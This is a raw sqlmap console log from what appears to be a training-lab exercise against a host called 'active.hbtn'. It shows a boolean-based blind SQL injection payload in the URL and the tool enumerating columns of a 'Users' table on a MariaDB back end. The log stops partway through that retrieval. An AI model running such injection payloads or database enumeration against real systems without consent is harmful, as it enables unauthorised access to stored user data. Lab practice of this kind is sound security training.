        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.4#stable}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:19:38 /2025-10-10/

[10:19:39] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[10:19:39] [INFO] resuming back-end DBMS 'mysql' 
[10:19:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://active.hbtn/product/1' AND 4563=4563 AND 'cbAI'='cbAI
---
[10:19:39] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0
back-end DBMS: MySQL 5 (MariaDB fork)
[10:19:39] [INFO] fetching columns for table 'Users' in database 'active.hbtn'
[10:19:39] [INFO] resumed: 4
[10:19:39] [INFO] resumed: id
[10:19:39] [INFO] resumed: int(11)
[10:19:39] [INFO] resuming partial value: user
[10:19:39] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[10:19:39] [INFO] retrieved: name

[10:19:56] [INFO] retrieved: varchar(25

[10:20:34] [WARNING] your sqlmap version is outdated

[*] ending @ 10:20:34 /2025-10-10/

